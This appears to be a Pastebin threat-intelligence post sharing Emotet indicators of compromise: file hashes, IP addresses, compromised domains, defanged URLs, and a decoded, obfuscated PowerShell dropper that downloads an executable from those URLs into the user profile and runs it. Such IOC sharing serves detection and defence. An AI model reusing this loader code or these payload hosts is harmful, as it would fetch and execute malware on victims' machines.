Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Emotet #Docs #malware #OSINT #IOC
- MD5:
- 0b5ac5eaa42d20caef4e22e5ae9ff7ae
- 13b5626ec24bb30f5a8c0f394e04e03e
- 99701dc81d245c4e57e34026e0d9fd33
- c544c49cd6baecb02bd20d7c7d662634
- dadc35fedb012bb20d655ac242646227
- IPs:
- 103.1.238.18
- 132.148.217.193
- 148.72.118.70
- Domains:
- asianlakeviewbinhphuoc.com
- refabit.co.ke
- vipcanadatours.com
- www.parantezlojistik.com
- www.viral-gift.com
- URLs:
- hxxp://asianlakeviewbinhphuoc.com/wp-content/prcHocQjkn/
- hxxps://vipcanadatours.com/wp-admin/20tikuee4l_88vynz4-856181111/
- hxxp://www.viral-gift.com/wp-admin/wuysk6u_k68ce1sdu-101546798/
- hxxps://refabit.co.ke/dvog/wiBerHCNFq/
- hxxp://www.parantezlojistik.com/wp-admin/RDHaWtuW/
- Decoded Base64 Powershell:
- $BhI9DG='vhQBGu';
- $GknfpjD = '247';
- $MoK_jA='DhJtan';
- $LAWnwh=$env:userprofile+'\'+$GknfpjD+'.exe';
- $wrHtMK5R='zpcB1Y1j';
- $Rc5hTdo=&('n'+'ew'+'-obje'+'ct') net.weBCLiEnt;
- $ShOuLGw='hxxp://asianlakeviewbinhphuoc.com/wp-content/prcHocQjkn/
- hxxps://vipcanadatours.com/wp-admin/20tikuee4l_88vynz4-856181111/
- hxxp://www.viral-gift.com/wp-admin/wuysk6u_k68ce1sdu-101546798/
- hxxps://refabit.co.ke/dvog/wiBerHCNFq/
- hxxp://www.parantezlojistik.com/wp-admin/RDHaWtuW/'."Sp`LIT"('
- ');
- $WSdh1s_='ii62PKCH';
- foreach($KdWOsp in $ShOuLGw){try{$Rc5hTdo."doW`NlO`ADFILe"($KdWOsp, $LAWnwh);
- $Eu4rqBow='n55T_VoO';
- If ((.('G'+'et-It'+'em') $LAWnwh)."lE`N`gth" -ge 31805) {[Diagnostics.Process]::"S`TArT"($LAWnwh);
- $IVWuZFz='pQ4kPrim';
- break;
- $K594Jql='uhzhEb6Z'}}catch{}}$O8zmM5fB='QwCbFr'
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
